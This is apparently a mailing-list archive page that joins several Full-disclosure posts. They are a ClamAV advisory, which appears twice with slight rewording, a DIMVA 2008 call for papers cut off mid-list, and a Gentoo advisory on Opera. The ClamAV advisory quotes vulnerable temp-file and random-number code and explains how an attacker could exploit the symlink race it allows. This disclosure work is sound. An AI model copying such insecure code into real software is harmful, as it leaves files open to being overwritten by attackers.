"/tmp" are used. The generated format of the file name is $TMPDIR/clamav-$HASH, where $HASH is generated from a fixed 16 byte "salt" and 32 (more or less) random bytes. The salt is defined in the following way: static unsigned char name_salt[16] = { 16, 38, 97, 12, 8, 4, 72, 196, 217, 144, 33, 124, 18, 11, 17, 253 }; The random bytes are generated with an internal function cli_rndnum() which looks like this: unsigned int cli_rndnum(unsigned int max) { struct timeval tv; gettimeofday(&tv, (struct timezone *) 0); srand(tv.tv_usec+clock()); return rand() % max; } As you can see, every time cli_rndnum() is called, the random number generator is reinitialized with the microsecond component of the current time and an "approximation of the processor time used by the program" using the clock() function. This takes away a lot of randomness from the value returned by cli_rndnum(): as seed, more or less public information which should be relatively easy to be guessed by the attacker is used, making it possible to guess the value returned by rand(). Also, since the random number generator is reseeded every time cli_rndnum() is called, every returned value is directly computed from the seed. In addition, cli_rndnum() uses the modulo operator to "cut off" the random number at a maximum value, which is discouraged by virtually every documentation of the rand() function. The publication "Numerical Recipes in C: The Art of Scientific Computing"[0] says about the use of rand(): "If you want to generate a random integer between 1 and 10, you should always do it by using high-order bits, as in j=1+(int) (10.0*rand()/(RAND_MAX+1.0)); and never by anything resembling j=1+(rand() % 10); (which uses lower-order bits)." The function cli_gentempfd() is used throughout the whole ClamAV source code in numerous places, which means that all these places are affected by the race conditions. 
Ironically, the code also uses cli_gentemp() in several places to generate a random file name and then passes that name to open() with the O_EXCL flag set. The race condition was introduced to the ClamAV source code on August 31st, 2007, in SVN revision 3196. The first release that contains the bug was 0.92. Since then, the code has remained in the trunk of the SVN repository. == == Base64 UUEncoded Files Scanner Bypassing Details == == ClamAV contains functionality to unpack and scan different types of files, such as archive files. Among others, UUEncoded files
[Full-disclosure] DIMVA 2008 - Call For Papers
Dear Colleagues, Attached please find the Call For Papers for DIMVA 2008, the Fifth GI International Conference on Detection of Intrusions & Malware, and Vulnerability Assessment; which is to be held in Paris, France, July 10-11, 2008. Complete information is available at http://www.dimva.org/dimva2008. Please feel free to distribute this announcement. We apologize if you receive multiple copies of this message. Best Regards, The DIMVA 2008 Organizing Committee - DIMVA 2008 Fifth GI International Conference on Detection of Intrusions & Malware, and Vulnerability Assessment Organized by the GI Special Interest Group SIDAR [1]http://dimva.org/dimva2008/ July 10-11th, 2008 Paris, France Call for Papers The annual DIMVA conference serves as a premier forum for advancing the state of the art in intrusion detection, malware detection, and vulnerability assessment. Each year DIMVA brings together international experts from academia, industry and government to present and discuss novel research in these areas. DIMVA is organized by the special interest group [2]Security - Intrusion Detection and Response of the [3]German Informatics Society (GI). The conference proceedings will appear in Springer's [4]Lecture Notes in Computer Science (LNCS) series. DIMVA solicits submission of high-quality, original scientific work. This year we invite two types of paper submissions: * Full papers, presenting novel and mature research results. Full papers are limited to 20 pages, prepared according to the instructions provided below. They will be reviewed by the program committee, and papers accepted for presentation at the conference will be included in the proceedings. * Short papers (extended abstracts), presenting original, still ongoing work that has not yet reached the maturity required for a full paper. Short papers are limited to 10 pages, prepared according to the instructions provided below. 
They will also be reviewed by the program committee, and papers accepted for presentation at the conference will be included in the proceedings (containing Extended Abstract in the title). DIMVA's scope includes, but is not restricted to the following areas: * Intrusion Detection + Approaches + Implementations + Prevention and response + Result correlation + Evaluation + Potentials and limitations + Operational experiences + Evasion and other attacks + Legal and social aspects * Malware + Techniques + Detection + Prevention and containment + Evaluation + Trends and upcoming risks + Forensics and recovery * Vulnerability Assessment + Vulnerabilities + Vulnerability detection + Vulnerability prevention + Classification and evaluation DIMVA particularly encourages papers that discuss the integration of intrusion, malware, and vulnerability detection in large-scale operational communication networks. Organizing Committee General Chair: Hervé Debar, France Telecom R&D, France ([EMAIL PROTECTED]) Program Chair: Diego Zamboni, IBM Zurich Research Lab, Switzerland ([EMAIL PROTECTED]) Sponsor Chair: Ludovic Mé, Supélec ([EMAIL PROTECTED]) Publicity Chair: Tadeusz Pietraszek, Google, Switzerland ([EMAIL PROTECTED]) Program Committee * Kostas Anagnostakis (Institute for Infocomm Research, Singapore) * Thomas Biege (SuSE, Germany) * David Brumley (Carnegie Mellon University, U.S.A.) * Roland Büschkes (RWE AG, Germany) * Weidong Cui (Microsoft Research) * Marc Dacier (Institut Eurecom, France) * Sven Dietrich (Stevens Institute of Technology, U.S.A.) * Holger Dreger (Siemens CERT, Germany) * Ulrich Flegel (University of Dortmund, Germany) * Marc Heuse (Baseline Security Consulting, Germany) * Thorsten Holz (University of Mannheim, Germany) * Ming-Yuh Huang (Boeing, U.S.A.) 
* Bernhard Hämmerli (HTA Lucerne, Switzerland) * Martin Johns (University of Hamburg, Germany) * Erland Jonsson (Chalmers University, Sweden) * Klaus Julisch (IBM Zurich Research Laboratory, Switzerland) * Christian Kreibich (International Computer Science Institute, U.S.A.) * Christopher Kruegel (Technical University of Vienna, Austria) * Pavel Laskov (Fraunhofer FIRST and University of Tuebingen, Germany) * Wenke Lee (Georgia Institute of Technology, U.S.A.) * John McHugh (Dalhousie University, Canada) * Michael Meier (University of Dortmund, Ger
[Full-disclosure] [ GLSA 200712-22 ] Opera: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Opera: Multiple vulnerabilities Date: December 30, 2007 Bugs: #202770 ID: 200712-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were discovered in Opera, allowing for the execution of arbitrary code and cross domain scripting. Background == Opera is a fast Web browser that is available free of charge. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/opera < 9.25 >= 9.25 Description === David Bloom reported two vulnerabilities where plug-ins (CVE-2007-6520) and Rich text editing (CVE-2007-6522) could be used to allow cross domain scripting. Alexander Klink (Cynops GmbH) discovered an issue with TLS certificates (CVE-2007-6521). Gynvael Coldwind reported that bitmaps might reveal random data from memory (CVE-2007-6524). Impact == A remote attacker could exploit these vulnerabilities, possibly leading to the execution of arbitrary code and cross domain scripting. Workaround == There is no known workaround at this time. 
Resolution == All Opera users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/opera-9.25" References == [ 1 ] CVE-2007-6520 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6520 [ 2 ] CVE-2007-6521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6521 [ 3 ] CVE-2007-6522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6522 [ 4 ] CVE-2007-6524 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6524 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHd9KfuhJ+ozIKI5gRAr0iAJ9wF5YhZ3B2T9jsJiE/1uK10Uf1swCeJk5p cwmBruk15tQBOvmnfRqySSk= =DhPV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TK53 Advisory #2: Multiple vulnerabilities in ClamAV
TK53 Advisory #2 12/29/2007 - Multiple vulnerabilities in ClamAV * Authors: Roflek of TK53 <[EMAIL PROTECTED]>, Lolek of TK53 <[EMAIL PROTECTED]> * Affected program: ClamAV (http://www.clamav.net/) * Affected versions: 0.92 * Overview: 1) ClamAV uses its own functions to create temporary files. One such routine is vulnerable to a race condition attack. 2) ClamAV fails to properly check for base64-UUEncoded files, allowing the scanner to be bypassed through the use of such files. 3) The sigtool utility included in the ClamAV distribution fails to handle created files in a secure way. == == Race Condition Vulnerability Details == == $SOURCE/libclamav/others.c (line 488): int cli_gentempfd(const char *dir, char **name, int *fd) { *name = cli_gentemp(dir); if(!*name) return CL_EMEM; *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU); if(*fd == -1) { cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", *name, strerror(errno)); free(*name); return CL_EIO; } return CL_SUCCESS; } This function, cli_gentempfd, uses a custom function to generate a (more or less) unique file name which is then opened, and the file descriptor is returned via an output parameter. The problem with this code is that a race condition exists: if the attacker is able to guess the generated file name, he/she is able to create a file of that name (for example a symbolic link pointing at another file) between the calls to cli_gentemp() and open(); because open() is called with O_TRUNC and without O_EXCL, this makes it possible to overwrite arbitrary files to which the user that runs ClamAV has write access with temporary data. A solution to fix this problem is to use the O_EXCL option for open(). With this option, open() fails if the file already exists, so a file planted by the attacker is never opened. So, how does the file name generation happen? First, cli_gentemp() determines the temporary directory. Users of the cli_gentemp() function can specify their own custom temporary directory. If none is specified, then the content of the TMPDIR environment variable is used. If the environment variable is unset, then P_tmpdir resp. 
"/tmp" are used. The generated format of the file name is $TMPDIR/clamav-$HASH, where $HASH is generated from a fixed 16 byte "salt" and 32 (more or less) random bytes. The salt is defined in the following way: static unsigned char name_salt[16] = { 16, 38, 97, 12, 8, 4, 72, 196, 217, 144, 33, 124, 18, 11, 17, 253 }; The random bytes are generated with an internal function cli_rndnum() which looks like this: unsigned int cli_rndnum(unsigned int max) { struct timeval tv; gettimeofday(&tv, (struct timezone *) 0); srand(tv.tv_usec+clock()); return rand() % max; } As you can see, every time cli_rndnum() is called, the random number generator is reinitialized with the microsecond component of the current time and an "approximation of the processor time used by the program" using the clock() function. This takes away a lot of randomness from the value returned by cli_rndnum(): the seed is more or less public information that should be relatively easy for the attacker to guess, making it possible to predict the value returned by rand(). Also, since the random number generator is reseeded every time cli_rndnum() is called, every returned value is directly computed from the seed. In addition, cli_rndnum() uses the modulo operator to "cut off" the random number at a maximum value, which is discouraged by virtually every documentation of the rand() function. The publication "Numerical Recipes in C: The Art of Scientific Computing"[0] says about the use of rand(): "If you want to generate a random integer between 1 and 10, you should always do it by using high-order bits, as in j=1+(int) (10.0*rand()/(RAND_MAX+1.0)); and never by anything resembling j=1+(rand() % 10); (which uses lower-order bits)." The function cli_gentempfd() is used throughout the whole ClamAV source code in numerous places, which means that all these places are affected by the race condition. 
Ironically, the code also uses cli_gentemp() in several places to generate a random file name and then passes the file name to a call to open() with the O_EXCL option enabled. The race condition was introduced to the ClamAV source code on August 31st, 2007, in SVN revision 3196. The first release that contains the bug was 0.92. Since then, the code has remained in the trunk of the SVN repository. == == Base64 UUEncoded Files Scanner Bypassing Details == == ClamAV contains functionality to unpack and scan different types of files, such as archive files. Among others, UUEncoded files